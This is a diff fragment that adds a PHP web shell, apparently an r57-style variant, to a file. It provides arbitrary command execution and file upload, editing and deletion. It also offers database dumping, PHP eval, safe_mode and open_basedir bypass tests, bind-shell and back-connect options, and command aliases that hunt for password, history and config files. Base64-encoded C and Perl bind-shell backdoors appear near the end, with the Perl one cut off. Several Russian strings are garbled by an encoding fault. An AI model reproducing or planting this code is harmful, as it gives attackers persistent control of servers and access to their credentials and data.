echo "</form>"; + echo "<br><div align=center><font face=Verdana size=-2><b>[ <a href=".$_SERVER['PHP_SELF'].">BACK</a> ]</b></font></div>"; die(); + } +if(isset($_GET['delete'])) + { + @unlink(@substr(@strrchr($_SERVER['PHP_SELF'],"/"),1)); + } +if(isset($_GET['tmp'])) + { + @unlink("/tmp/bdpl"); + @unlink("/tmp/back"); + @unlink("/tmp/bd"); + @unlink("/tmp/bd.c"); + @unlink("/tmp/dp"); + @unlink("/tmp/dpc"); + @unlink("/tmp/dpc.c"); + } +if(isset($_GET['phpini'])) +{ +echo $head; +function U_value($value) + { + if ($value == '') return '<i>no value</i>'; + if (@is_bool($value)) return $value ? 'TRUE' : 'FALSE'; + if ($value === null) return 'NULL'; + if (@is_object($value)) $value = (array) $value; + if (@is_array($value)) + { + @ob_start(); + print_r($value); + $value = @ob_get_contents(); + @ob_end_clean(); + } + return U_wordwrap((string) $value); + } +function U_wordwrap($str) + { + $str = @wordwrap(@htmlspecialchars($str), 100, '<wbr />', true); + return @preg_replace('!(&[^;]*)<wbr />([^;]*;)!', '$1$2<wbr />', $str); + } +if (@function_exists('ini_get_all')) + { + $r = ''; + echo '<table width=100%>', '<tr><td bgcolor=#cccccc><font face=Verdana size=-2 color=red><div align=center><b>Directive</b></div></font></td><td bgcolor=#cccccc><font face=Verdana size=-2 color=red><div align=center><b>Local Value</b></div></font></td><td bgcolor=#cccccc><font face=Verdana size=-2 color=red><div align=center><b>Master Value</b></div></font></td></tr>'; + foreach (@ini_get_all() as $key=>$value) + { + $r .= '<tr><td>'.ws(3).'<font face=Verdana size=-2><b>'.$key.'</b></font></td><td><font face=Verdana size=-2><div align=center><b>'.U_value($value['local_value']).'</b></div></font></td><td><font face=Verdana size=-2><div align=center><b>'.U_value($value['global_value']).'</b></div></font></td></tr>'; + } + echo $r; + echo '</table>'; + } +echo "<br><div align=center><font face=Verdana size=-2><b>[ <a href=".$_SERVER['PHP_SELF'].">BACK</a> ]</b></font></div>"; +die(); +} +if(isset($_GET['cpu'])) + { + echo $head; + echo '<table width=100%><tr><td bgcolor=#cccccc><div align=center><font face=Verdana size=-2 color=red><b>CPU</b></font></div></td></tr></table><table width=100%>'; + $cpuf = @file("cpuinfo"); + if($cpuf) + { + $c = @sizeof($cpuf); + for($i=0;$i<$c;$i++) + { + $info = @explode(":",$cpuf[$i]); + if($info[1]==""){ $info[1]="---"; } + $r .= '<tr><td>'.ws(3).'<font face=Verdana size=-2><b>'.trim($info[0]).'</b></font></td><td><font face=Verdana size=-2><div align=center><b>'.trim($info[1]).'</b></div></font></td></tr>'; + } + echo $r; + } + else + { + echo '<tr><td>'.ws(3).'<div align=center><font face=Verdana size=-2><b> --- </b></font></div></td></tr>'; + } + echo '</table>'; + echo "<br><div align=center><font face=Verdana size=-2><b>[ <a href=".$_SERVER['PHP_SELF'].">BACK</a> ]</b></font></div>"; + die(); + } +if(isset($_GET['mem'])) + { + echo $head; + echo '<table width=100%><tr><td bgcolor=#cccccc><div align=center><font face=Verdana size=-2 color=red><b>MEMORY</b></font></div></td></tr></table><table width=100%>'; + $memf = @file("meminfo"); + if($memf) + { + $c = sizeof($memf); + for($i=0;$i<$c;$i++) + { + $info = explode(":",$memf[$i]); + if($info[1]==""){ $info[1]="---"; } + $r .= '<tr><td>'.ws(3).'<font face=Verdana size=-2><b>'.trim($info[0]).'</b></font></td><td><font face=Verdana size=-2><div align=center><b>'.trim($info[1]).'</b></div></font></td></tr>'; + } + echo $r; + } + else + { + echo '<tr><td>'.ws(3).'<div align=center><font face=Verdana size=-2><b> --- </b></font></div></td></tr>'; + } + echo '</table>'; + echo "<br><div align=center><font face=Verdana size=-2><b>[ <a href=".$_SERVER['PHP_SELF'].">BACK</a> ]</b></font></div>"; + die(); + } +/* +Выбор Ñзыка +$language='ru' - руÑÑкий +$language='eng' - английÑкий +*/ +$language='eng'; +$lang=array( +'ru_text1' =>'Ð’Ñ‹Ð¿Ð¾Ð»Ð½ÐµÐ½Ð½Ð°Ñ ÐºÐ¾Ð¼Ð°Ð½Ð´Ð°', +'ru_text2' =>'Выполнение команд на Ñервере', +'ru_text3' =>'Выполнить команду', +'ru_text4' =>'Ð Ð°Ð±Ð¾Ñ‡Ð°Ñ Ð´Ð¸Ñ€ÐµÐºÑ‚Ð¾Ñ€Ð¸Ñ', +'ru_text5' =>'Загрузка файлов на Ñервер', +'ru_text6' =>'Локальный файл', +'ru_text7' =>'ÐлиаÑÑ‹', +'ru_text8' =>'Выберите алиаÑ', +'ru_butt1' =>'Выполнить', +'ru_butt2' =>'Загрузить', +'ru_text9' =>'Открытие порта и привÑзка его к /bin/bash', +'ru_text10'=>'Открыть порт', +'ru_text11'=>'Пароль Ð´Ð»Ñ Ð´Ð¾Ñтупа', +'ru_butt3' =>'Открыть', +'ru_text12'=>'back-connect', +'ru_text13'=>'IP-адреÑ', +'ru_text14'=>'Порт', +'ru_butt4' =>'Выполнить', +'ru_text15'=>'Загрузка файлов Ñ ÑƒÐ´Ð°Ð»ÐµÐ½Ð½Ð¾Ð³Ð¾ Ñервера', +'ru_text16'=>'ИÑпользовать', +'ru_text17'=>'Удаленный файл', +'ru_text18'=>'Локальный файл', +'ru_text19'=>'Exploits', +'ru_text20'=>'ИÑпользовать', +'ru_text21'=>'Ðовое имÑ', +'ru_text22'=>'datapipe', +'ru_text23'=>'Локальный порт', +'ru_text24'=>'Удаленный хоÑÑ‚', +'ru_text25'=>'Удаленный порт', +'ru_text26'=>'ИÑпользовать', +'ru_butt5' =>'ЗапуÑтить', +'ru_text28'=>'Работа в safe_mode', +'ru_text29'=>'ДоÑтуп запрещен', +'ru_butt6' =>'Сменить', +'ru_text30'=>'ПроÑмотр файла', +'ru_butt7' =>'ВывеÑти', +'ru_text31'=>'Файл не найден', +'ru_text32'=>'Выполнение PHP кода', +'ru_text33'=>'Проверка возможноÑти обхода ограничений open_basedir через функции cURL', +'ru_butt8' =>'Проверить', +'ru_text34'=>'Проверка возможноÑти обхода ограничений safe_mode через функцию include', +'ru_text35'=>'Проверка возможноÑти обхода ограничений safe_mode через загрузку файла в mysql', +'ru_text36'=>'База', +'ru_text37'=>'Логин', +'ru_text38'=>'Пароль', +'ru_text39'=>'Таблица', +'ru_text40'=>'Дамп таблицы базы данных', +'ru_butt9' =>'Дамп', +'ru_text41'=>'Сохранить в файле', +'ru_text42'=>'Редактирование файла', +'ru_text43'=>'Редактировать файл', +'ru_butt10'=>'Сохранить', +'ru_butt11'=>'Редактировать', +'ru_text44'=>'Редактирование файла невозможно! ДоÑтуп только Ð´Ð»Ñ Ñ‡Ñ‚ÐµÐ½Ð¸Ñ!', +'ru_text45'=>'Файл Ñохранен', +'ru_text46'=>'ПроÑмотр phpinfo()', +'ru_text47'=>'ПроÑмотр наÑтроек php.ini', +'ru_text48'=>'Удаление временных файлов', +'ru_text49'=>'Удаление Ñкрипта Ñ Ñервера', +'ru_text50'=>'Ð˜Ð½Ñ„Ð¾Ñ€Ð¼Ð°Ñ†Ð¸Ñ Ð¾ процеÑÑоре', +'ru_text51'=>'Ð˜Ð½Ñ„Ð¾Ñ€Ð¼Ð°Ñ†Ð¸Ñ Ð¾ памÑти', +'ru_text52'=>'ТекÑÑ‚ Ð´Ð»Ñ Ð¿Ð¾Ð¸Ñка', +'ru_text53'=>'ИÑкать в папке', +'ru_text54'=>'ПоиÑк текÑта в файлах', +'ru_butt12'=>'Ðайти', +'ru_text55'=>'Только в файлах', +'ru_text56'=>'Ðичего не найдено', +'ru_text57'=>'Создать/Удалить Файл/Директорию', +'ru_text58'=>'ИмÑ', +'ru_text59'=>'Файл', +'ru_text60'=>'Директорию', +'ru_butt13'=>'Создать/Удалить', +'ru_text61'=>'Файл Ñоздан', +'ru_text62'=>'Ð”Ð¸Ñ€ÐµÐºÑ‚Ð¾Ñ€Ð¸Ñ Ñоздана', +'ru_text63'=>'Файл удален', +'ru_text64'=>'Ð”Ð¸Ñ€ÐµÐºÑ‚Ð¾Ñ€Ð¸Ñ ÑƒÐ´Ð°Ð»ÐµÐ½Ð°', +'ru_text65'=>'Создать', +'ru_text66'=>'Удалить', +'ru_text67'=>'Chown/Chgrp/Chmod', +'ru_text68'=>'Команда', +'ru_text69'=>'Параметр1', +'ru_text70'=>'Параметр2', +'ru_text71'=>"Второй параметр команды:\r\n- Ð´Ð»Ñ CHOWN - Ð¸Ð¼Ñ Ð½Ð¾Ð²Ð¾Ð³Ð¾ Ð¿Ð¾Ð»ÑŒÐ·Ð¾Ð²Ð°Ñ‚ÐµÐ»Ñ Ð¸Ð»Ð¸ его UID (чиÑлом) \r\n- Ð´Ð»Ñ ÐºÐ¾Ð¼Ð°Ð½Ð´Ñ‹ CHGRP - Ð¸Ð¼Ñ Ð³Ñ€ÑƒÐ¿Ð¿Ñ‹ или GID (чиÑлом) \r\n- Ð´Ð»Ñ ÐºÐ¾Ð¼Ð°Ð½Ð´Ñ‹ CHMOD - целое чиÑло в воÑьмеричном предÑтавлении (например 0777)", +'ru_text72'=>'ТекÑÑ‚ Ð´Ð»Ñ Ð¿Ð¾Ð¸Ñка', +'ru_text73'=>'ИÑкать в папке', +'ru_text74'=>'ИÑкать в файлах', +'ru_text75'=>'* можно иÑпользовать регулÑрное выражение', +'ru_text76'=>'ПоиÑк текÑта в файлах Ñ Ð¿Ð¾Ð¼Ð¾Ñ‰ÑŒÑŽ утилиты find', +'ru_text77'=>'ПроÑмотр Ñтруктуры базы данных', +'ru_text78'=>'Показывать таблицы', +'ru_text79'=>'Показывать Ñтолбцы', +'ru_text80'=>'Тип', +'ru_text81'=>'Сеть', +'ru_text82'=>'Базы данных', +'ru_text83'=>'Выполнение SQL запроÑа', +'ru_text84'=>'SQL запроÑ', +'ru_text85'=>'Проверка возможноÑти обхода ограничений safe_mode через выполнение команд в MSSQL Ñервере', +/* --------------------------------------------------------------- */ +'eng_text1' =>'Sikat..!!', +'eng_text2' =>'Sikat.. di server', +'eng_text3' =>'Jalankan perintah', +'eng_text4' =>'Direktori Skrg', +'eng_text5' =>'Upload files ke server', +'eng_text6' =>'Local file', +'eng_text7' =>'Aliases', +'eng_text8' =>'Select alias', +'eng_butt1' =>'Sikat', +'eng_butt2' =>'Upload', +'eng_text9' =>'Bind port to /bin/bash', +'eng_text10'=>'Port', +'eng_text11'=>'Password untuk', +'eng_butt3' =>'Bind', +'eng_text12'=>'back-connect', +'eng_text13'=>'IP', +'eng_text14'=>'Port', +'eng_butt4' =>'Connect', +'eng_text15'=>'Upload files from remote server', +'eng_text16'=>'With', +'eng_text17'=>'Remote file', +'eng_text18'=>'Local file', +'eng_text19'=>'Exploits', +'eng_text20'=>'Use', +'eng_text21'=>'&nbsp;New name', +'eng_text22'=>'datapipe', +'eng_text23'=>'Local port', +'eng_text24'=>'Remote host', +'eng_text25'=>'Remote port', +'eng_text26'=>'Use', +'eng_butt5' =>'Run', +'eng_text28'=>'Work in safe_mode', +'eng_text29'=>'ACCESS DENIED', +'eng_butt6' =>'Change', +'eng_text30'=>'Cat file', +'eng_butt7' =>'Show', +'eng_text31'=>'File not found', +'eng_text32'=>'Eval PHP code', +'eng_text33'=>'Test bypass open_basedir with cURL functions', +'eng_butt8' =>'Test', +'eng_text34'=>'Test bypass safe_mode with include function', +'eng_text35'=>'Test bypass safe_mode with load file in mysql', +'eng_text36'=>'Database', +'eng_text37'=>'Login', +'eng_text38'=>'Password', +'eng_text39'=>'Table', +'eng_text40'=>'Dump database table', +'eng_butt9' =>'Dump', +'eng_text41'=>'Save dump in file', +'eng_text42'=>'Edit files', +'eng_text43'=>'File for edit', +'eng_butt10'=>'Save', +'eng_text44'=>'Can\'t edit file! Only read access!', +'eng_text45'=>'File saved', +'eng_text46'=>'Show phpinfo()', +'eng_text47'=>'Show variables from php.ini', +'eng_text48'=>'Delete temp files', +'eng_butt11'=>'Edit file', +'eng_text49'=>'Delete script from server', +'eng_text50'=>'View cpu info', +'eng_text51'=>'View memory info', +'eng_text52'=>'Find text', +'eng_text53'=>'In dirs', +'eng_text54'=>'Find text in files', +'eng_butt12'=>'Find', +'eng_text55'=>'Only in files', +'eng_text56'=>'Nothing :(', +'eng_text57'=>'Create/Delete File/Dir', +'eng_text58'=>'name', +'eng_text59'=>'file', +'eng_text60'=>'dir', +'eng_butt13'=>'Create/Delete', +'eng_text61'=>'File created', +'eng_text62'=>'Dir created', +'eng_text63'=>'File deleted', +'eng_text64'=>'Dir deleted', +'eng_text65'=>'Create', +'eng_text66'=>'Delete', +'eng_text67'=>'Chown/Chgrp/Chmod', +'eng_text68'=>'Command', +'eng_text69'=>'param1', +'eng_text70'=>'param2', +'eng_text71'=>"Second commands param is:\r\n- for CHOWN - name of new owner or UID\r\n- for CHGRP - group name or GID\r\n- for CHMOD - 0777, 0755...", +'eng_text72'=>'Text for find', +'eng_text73'=>'Find in folder', +'eng_text74'=>'Find in files', +'eng_text75'=>'* you can use regexp', +'eng_text76'=>'Search text in files via find', +'eng_text77'=>'Show database structure', +'eng_text78'=>'show tables', +'eng_text79'=>'show columns', +'eng_text80'=>'Type', +'eng_text81'=>'Net', +'eng_text82'=>'Databases', +'eng_text83'=>'Run SQL query', +'eng_text84'=>'SQL query', +); +/* +ÐлиаÑÑ‹ команд +ПозволÑÑŽÑ‚ избежать многократного набора одних и тех-же команд. ( Сделано Ð±Ð»Ð°Ð³Ð¾Ð´Ð°Ñ€Ñ Ð¼Ð¾ÐµÐ¹ природной лени ) +Ð’Ñ‹ можете Ñами добавлÑÑ‚ÑŒ или изменÑÑ‚ÑŒ команды. +*/ +$aliases=array( +'find suid files'=>'find / -type f -perm -04000 -ls', +'find suid files in current dir'=>'find . -type f -perm -04000 -ls', +'find sgid files'=>'find / -type f -perm -02000 -ls', +'find sgid files in current dir'=>'find . -type f -perm -02000 -ls', +'find config.inc.php files'=>'find / -type f -name config.inc.php', +'find config.inc.php files in current dir'=>'find . -type f -name config.inc.php', +'find config* files'=>'find / -type f -name "config*"', +'find config* files in current dir'=>'find . -type f -name "config*"', +'find all writable files'=>'find / -type f -perm -2 -ls', +'find all writable files in current dir'=>'find . -type f -perm -2 -ls', +'find all writable directories'=>'find / -type d -perm -2 -ls', +'find all writable directories in current dir'=>'find . -type d -perm -2 -ls', +'find all writable directories and files'=>'find / -perm -2 -ls', +'find all writable directories and files in current dir'=>'find . -perm -2 -ls', +'find all service.pwd files'=>'find / -type f -name service.pwd', +'find service.pwd files in current dir'=>'find . -type f -name service.pwd', +'find all .htpasswd files'=>'find / -type f -name .htpasswd', +'find .htpasswd files in current dir'=>'find . -type f -name .htpasswd', +'find all .bash_history files'=>'find / -type f -name .bash_history', +'find .bash_history files in current dir'=>'find . -type f -name .bash_history', +'find all .mysql_history files'=>'find / -type f -name .mysql_history', +'find .mysql_history files in current dir'=>'find . -type f -name .mysql_history', +'find all .fetchmailrc files'=>'find / -type f -name .fetchmailrc', +'find .fetchmailrc files in current dir'=>'find . -type f -name .fetchmailrc', +'list file attributes on a Linux second extended file system'=>'lsattr -va', +'show opened ports'=>'netstat -an | grep -i listen', +'----------------------------------------------------------------------------------------------------'=>'ls -la' +); +$table_up1 = "<tr><td bgcolor=#cccccc><font face=Verdana size=-2><b><div align=center>:: "; +$table_up2 = " ::</div></b></font></td></tr><tr><td>"; +$table_up3 = "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><tr><td bgcolor=#cccccc>"; +$table_end1 = "</td></tr>"; +$arrow = " <font face=Wingdings color=gray>и</font>"; +$lb = "<font color=black>[</font>"; +$rb = "<font color=black>]</font>"; +$font = "<font face=Verdana size=-2>"; +$ts = "<table class=table1 width=100% align=center>"; +$te = "</table>"; +$fs = "<form name=form method=POST>"; +$fe = "</form>"; + +if (!empty($_POST['dir'])) { @chdir($_POST['dir']); } +$dir = @getcwd(); +$windows = 0; +$unix = 0; +if(strlen($dir)>1 && $dir[1]==":") $windows=1; else $unix=1; +if(empty($dir)) + { + $os = getenv('OS'); + if(empty($os)){ $os = php_uname(); } + if(empty($os)){ $os ="-"; $unix=1; } + else + { + if(@eregi("^win",$os)) { $windows = 1; } + else { $unix = 1; } + } + } +if(!empty($_POST['s_dir']) && !empty($_POST['s_text']) && !empty($_POST['cmd']) && $_POST['cmd'] == "search_text") + { + echo $head; + if(!empty($_POST['s_mask']) && !empty($_POST['m'])) { $sr = new SearchResult($_POST['s_dir'],$_POST['s_text'],$_POST['s_mask']); } + else { $sr = new SearchResult($_POST['s_dir'],$_POST['s_text']); } + $sr->SearchText(0,0); + $res = $sr->GetResultFiles(); + $found = $sr->GetMatchesCount(); + $titles = $sr->GetTitles(); + $r = ""; + if($found > 0) + { + $r .= "<TABLE width=100%>"; + foreach($res as $file=>$v) + { + $r .= "<TR>"; + $r .= "<TD colspan=2><font face=Verdana size=-2><b>".ws(3); + $r .= ($windows)? str_replace("/","\\",$file) : $file; + $r .= "</b></font></ TD>"; + $r .= "</TR>"; + foreach($v as $a=>$b) + { + $r .= "<TR>"; + $r .= "<TD align=center><B><font face=Verdana size=-2>".$a."</font></B></TD>"; + $r .= "<TD><font face=Verdana size=-2>".ws(2).$b."</font></TD>"; + $r .= "</TR>\n"; + } + } + $r .= "</TABLE>"; + echo $r; + } + else + { + echo "<P align=center><B><font face=Verdana size=-2>".$lang[$language.'_text56']."</B></font></P>"; + } + echo "<br><div align=center><font face=Verdana size=-2><b>[ <a href=".$_SERVER['PHP_SELF'].">BACK</a> ]</b></font></div>"; + die(); + } +if($windows&&!$safe_mode) + { + $uname = ex("ver"); + if(empty($uname)) { $safe_mode = 1; } + } +else if($unix&&!$safe_mode) + { + $uname = ex("uname"); + if(empty($uname)) { $safe_mode = 1; } + } +$SERVER_SOFTWARE = getenv('SERVER_SOFTWARE'); +if(empty($SERVER_SOFTWARE)){ $SERVER_SOFTWARE = "-"; } +function ws($i) +{ +return @str_repeat("&nbsp;",$i); +} +function ex($cfe) +{ + $res = ''; + if (!empty($cfe)) + { + if(function_exists('exec')) + { + @exec($cfe,$res); + $res = join("\n",$res); + } + elseif(function_exists('shell_exec')) + { + $res = @shell_exec($cfe); + } + elseif(function_exists('system')) + { + @ob_start(); + @system($cfe); + $res = @ob_get_contents(); + @ob_end_clean(); + } + elseif(function_exists('passthru')) + { + @ob_start(); + @passthru($cfe); + $res = @ob_get_contents(); + @ob_end_clean(); + } + elseif(@is_resource($f = @popen($cfe,"r"))) + { + $res = ""; + while(!@feof($f)) { $res .= @fread($f,1024); } + @pclose($f); + } + } + return $res; +} +function we($i) +{ +if($GLOBALS['language']=="ru"){ $text = 'Ошибка! Ðе могу запиÑать в файл '; } +else { $text = "[-] ERROR! Can't write in file "; } +echo "<table width=100% cellpadding=0 cellspacing=0><tr><td bgcolor=#cccccc><font color=red face=Verdana size=-2><div align=center><b>".$text.$i."</b></div></font></td></tr></table>"; +return null; +} +function re($i) +{ +if($GLOBALS['language']=="ru"){ $text = 'Ошибка! Ðе могу прочитать файл '; } +else { $text = "[-] ERROR! Can't read file "; } +echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><tr><td bgcolor=#cccccc><font color=red face=Verdana size=-2><div align=center><b>".$text.$i."</b></div></font></td></tr></table>"; +return null; +} +function ce($i) +{ +if($GLOBALS['language']=="ru"){ $text = "Ðе удалоÑÑŒ Ñоздать "; } +else { $text = "Can't create "; } +echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><tr><td bgcolor=#cccccc><font color=red face=Verdana size=-2><div align=center><b>".$text.$i."</b></div></font></td></tr></table>"; +return null; +} +function perms($mode) +{ +if ($GLOBALS['windows']) return 0; +if( $mode & 0x1000 ) { $type='p'; } +else if( $mode & 0x2000 ) { $type='c'; } +else if( $mode & 0x4000 ) { $type='d'; } +else if( $mode & 0x6000 ) { $type='b'; } +else if( $mode & 0x8000 ) { $type='-'; } +else if( $mode & 0xA000 ) { $type='l'; } +else if( $mode & 0xC000 ) { $type='s'; } +else $type='u'; +$owner["read"] = ($mode & 00400) ? 'r' : '-'; +$owner["write"] = ($mode & 00200) ? 'w' : '-'; +$owner["execute"] = ($mode & 00100) ? 'x' : '-'; +$group["read"] = ($mode & 00040) ? 'r' : '-'; +$group["write"] = ($mode & 00020) ? 'w' : '-'; +$group["execute"] = ($mode & 00010) ? 'x' : '-'; +$world["read"] = ($mode & 00004) ? 'r' : '-'; +$world["write"] = ($mode & 00002) ? 'w' : '-'; +$world["execute"] = ($mode & 00001) ? 'x' : '-'; +if( $mode & 0x800 ) $owner["execute"] = ($owner['execute']=='x') ? 's' : 'S'; +if( $mode & 0x400 ) $group["execute"] = ($group['execute']=='x') ? 's' : 'S'; +if( $mode & 0x200 ) $world["execute"] = ($world['execute']=='x') ? 't' : 'T'; +$s=sprintf("%1s", $type); +$s.=sprintf("%1s%1s%1s", $owner['read'], $owner['write'], $owner['execute']); +$s.=sprintf("%1s%1s%1s", $group['read'], $group['write'], $group['execute']); +$s.=sprintf("%1s%1s%1s", $world['read'], $world['write'], $world['execute']); +return trim($s); +} +function in($type,$name,$size,$value) +{ + $ret = "<input type=".$type." name=".$name." "; + if($size != 0) { $ret .= "size=".$size." "; } + $ret .= "value=\"".$value."\">"; + return $ret; +} +function which($pr) +{ +$path = ex("which $pr"); +if(!empty($path)) { return $path; } else { return $pr; } +} +function cf($fname,$text) +{ + $w_file=@fopen($fname,"w") or we($fname); + if($w_file) + { + @fputs($w_file,@base64_decode($text)); + @fclose($w_file); + } +} +function sr($l,$t1,$t2) + { + return "<tr class=tr1><td class=td1 width=".$l."% align=right>".$t1."</td><td class=td1 align=left>".$t2."</td></tr>"; + } +if (!@function_exists("view_size")) +{ +function view_size($size) +{ + if($size >= 1073741824) {$size = @round($size / 1073741824 * 100) / 100 . " GB";} + elseif($size >= 1048576) {$size = @round($size / 1048576 * 100) / 100 . " MB";} + elseif($size >= 1024) {$size = @round($size / 1024 * 100) / 100 . " KB";} + else {$size = $size . " B";} + return $size; +} +} +function DirFiles($dir,$types='') + { + $files = Array(); + if(($handle = @opendir($dir))) + { + while (FALSE !== ($file = @readdir($handle))) + { + if ($file != "." && $file != "..") + { + if(!is_dir($dir."/".$file)) + { + if($types) + { + $pos = @strrpos($file,"."); + $ext = @substr($file,$pos,@strlen($file)-$pos); + if(@in_array($ext,@explode(';',$types))) + $files[] = $dir."/".$file; + } + else + $files[] = $dir."/".$file; + } + } + } + @closedir($handle); + } + return $files; + } + function DirFilesWide($dir) + { + $files = Array(); + $dirs = Array(); + if(($handle = @opendir($dir))) + { + while (false !== ($file = @readdir($handle))) + { + if ($file != "." && $file != "..") + { + if(@is_dir($dir."/".$file)) + { + $file = @strtoupper($file); + $dirs[$file] = '&lt;DIR&gt;'; + } + else + $files[$file] = @filesize($dir."/".$file); + } + } + @closedir($handle); + @ksort($dirs); + @ksort($files); + $files = @array_merge($dirs,$files); + } + return $files; + } + function DirFilesR($dir,$types='') + { + $files = Array(); + if(($handle = @opendir($dir))) + { + while (false !== ($file = @readdir($handle))) + { + if ($file != "." && $file != "..") + { + if(@is_dir($dir."/".$file)) + $files = @array_merge($files,DirFilesR($dir."/".$file,$types)); + else + { + $pos = @strrpos($file,"."); + $ext = @substr($file,$pos,@strlen($file)-$pos); + if($types) + { + if(@in_array($ext,explode(';',$types))) + $files[] = $dir."/".$file; + } + else + $files[] = $dir."/".$file; + } + } + } + @closedir($handle); + } + return $files; + } + function DirPrintHTMLHeaders($dir) + { + $pockets = ''; + $handle = @opendir($dir) or die("Can't open directory $dir"); + echo " <ul style='margin-left: 0px; padding-left: 20px;'>\n"; + while (false !== ($file = @readdir($handle))) + { + if ($file != "." && $file != "..") + { + if(@is_dir($dir."/".$file)) + { + echo " <li><b>[ $file ]</b></li>\n"; + DirPrintHTMLHeaders($dir."/".$file); + } + else + { + $pos = @strrpos($file,"."); + $ext = @substr($file,$pos,@strlen($file)-$pos); + if(@in_array($ext,array('.htm','.html'))) + { + $header = '-=None=-'; + $strings = @file($dir."/".$file) or die("Can't open file ".$dir."/".$file); + for($a=0;$a<count($strings);$a++) + { + $pattern = '(<title>(.+)</title>)'; + if(@eregi($pattern,$strings[$a],$pockets)) + { + $header = "&laquo;".$pockets[2]."&raquo;"; + break; + } + } + echo " <li>".$header."</li>\n"; + } + } + } + } + echo " </ul>\n"; + @closedir($handle); + } + + class SearchResult + { + var $text; + var $FilesToSearch; + var $ResultFiles; + var $FilesTotal; + var $MatchesCount; + var $FileMatschesCount; + var $TimeStart; + var $TimeTotal; + var $titles; + function SearchResult($dir,$text,$filter='') + { + $dirs = @explode(";",$dir); + $this->FilesToSearch = Array(); + for($a=0;$a<count($dirs);$a++) + $this->FilesToSearch = @array_merge($this->FilesToSearch,DirFilesR($dirs[$a],$filter)); + $this->text = $text; + $this->FilesTotal = @count($this->FilesToSearch); + $this->TimeStart = getmicrotime(); + $this->MatchesCount = 0; + $this->ResultFiles = Array(); + $this->FileMatchesCount = Array(); + $this->titles = Array(); + } + function GetFilesTotal() { return $this->FilesTotal; } + function GetTitles() { return $this->titles; } + function GetTimeTotal() { return $this->TimeTotal; } + function GetMatchesCount() { return $this->MatchesCount; } + function GetFileMatchesCount() { return $this->FileMatchesCount; } + function GetResultFiles() { return $this->ResultFiles; } + function SearchText($phrase=0,$case=0) { + $qq = @explode(' ',$this->text); + $delim = '|'; + if($phrase) + foreach($qq as $k=>$v) + $qq[$k] = '\b'.$v.'\b'; + $words = '('.@implode($delim,$qq).')'; + $pattern = "/".$words."/"; + if(!$case) + $pattern .= 'i'; + foreach($this->FilesToSearch as $k=>$filename) + { + $this->FileMatchesCount[$filename] = 0; + $FileStrings = @file($filename) or @next; + for($a=0;$a<@count($FileStrings);$a++) + { + $count = 0; + $CurString = $FileStrings[$a]; + $CurString = @Trim($CurString); + $CurString = @strip_tags($CurString); + $aa = ''; + if(($count = @preg_match_all($pattern,$CurString,$aa))) + { + $CurString = @preg_replace($pattern,"<SPAN style='color: #990000;'><b>\\1</b></SPAN>",$CurString); + $this->ResultFiles[$filename][$a+1] = $CurString; + $this->MatchesCount += $count; + $this->FileMatchesCount[$filename] += $count; + } + } + } + $this->TimeTotal = @round(getmicrotime() - $this->TimeStart,4); + } + } + function getmicrotime() + { + list($usec,$sec) = @explode(" ",@microtime()); + return ((float)$usec + (float)$sec); + } +$port_bind_bd_c="I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3RyaW5nLmg+DQojaW5jbHVkZSA8c3lzL3R5cGVzLmg+DQojaW5jbHVkZS +A8c3lzL3NvY2tldC5oPg0KI2luY2x1ZGUgPG5ldGluZXQvaW4uaD4NCiNpbmNsdWRlIDxlcnJuby5oPg0KaW50IG1haW4oYXJnYyxhcmd2KQ0KaW50I +GFyZ2M7DQpjaGFyICoqYXJndjsNCnsgIA0KIGludCBzb2NrZmQsIG5ld2ZkOw0KIGNoYXIgYnVmWzMwXTsNCiBzdHJ1Y3Qgc29ja2FkZHJfaW4gcmVt +b3RlOw0KIGlmKGZvcmsoKSA9PSAwKSB7IA0KIHJlbW90ZS5zaW5fZmFtaWx5ID0gQUZfSU5FVDsNCiByZW1vdGUuc2luX3BvcnQgPSBodG9ucyhhdG9 +pKGFyZ3ZbMV0pKTsNCiByZW1vdGUuc2luX2FkZHIuc19hZGRyID0gaHRvbmwoSU5BRERSX0FOWSk7IA0KIHNvY2tmZCA9IHNvY2tldChBRl9JTkVULF +NPQ0tfU1RSRUFNLDApOw0KIGlmKCFzb2NrZmQpIHBlcnJvcigic29ja2V0IGVycm9yIik7DQogYmluZChzb2NrZmQsIChzdHJ1Y3Qgc29ja2FkZHIgK +ikmcmVtb3RlLCAweDEwKTsNCiBsaXN0ZW4oc29ja2ZkLCA1KTsNCiB3aGlsZSgxKQ0KICB7DQogICBuZXdmZD1hY2NlcHQoc29ja2ZkLDAsMCk7DQog +ICBkdXAyKG5ld2ZkLDApOw0KICAgZHVwMihuZXdmZCwxKTsNCiAgIGR1cDIobmV3ZmQsMik7DQogICB3cml0ZShuZXdmZCwiUGFzc3dvcmQ6IiwxMCk +7DQogICByZWFkKG5ld2ZkLGJ1ZixzaXplb2YoYnVmKSk7DQogICBpZiAoIWNocGFzcyhhcmd2WzJdLGJ1ZikpDQogICBzeXN0ZW0oImVjaG8gd2VsY2 +9tZSB0byByNTcgc2hlbGwgJiYgL2Jpbi9iYXNoIC1pIik7DQogICBlbHNlDQogICBmcHJpbnRmKHN0ZGVyciwiU29ycnkiKTsNCiAgIGNsb3NlKG5ld +2ZkKTsNCiAgfQ0KIH0NCn0NCmludCBjaHBhc3MoY2hhciAqYmFzZSwgY2hhciAqZW50ZXJlZCkgew0KaW50IGk7DQpmb3IoaT0wO2k8c3RybGVuKGVu +dGVyZWQpO2krKykgDQp7DQppZihlbnRlcmVkW2ldID09ICdcbicpDQplbnRlcmVkW2ldID0gJ1wwJzsgDQppZihlbnRlcmVkW2ldID09ICdccicpDQp +lbnRlcmVkW2ldID0gJ1wwJzsNCn0NCmlmICghc3RyY21wKGJhc2UsZW50ZXJlZCkpDQpyZXR1cm4gMDsNCn0="; +$port_bind_bd_pl="IyEvdXNyL2Jpbi9wZXJsDQokU0hFTEw9Ii9iaW4vYmFzaCAtaSI7DQppZiAoQEFSR1YgPCAxKSB7IGV4aXQoMSk7IH0NCiRMS +VNURU5fUE9SVD0kQVJHVlswXTsNCnVzZSBTb2NrZXQ7DQokcHJvdG9jb2w9Z2V0cHJvdG9ieW5hbWUoJ3RjcCcpOw0Kc29ja2V0KFMsJlBGX0lORVQs 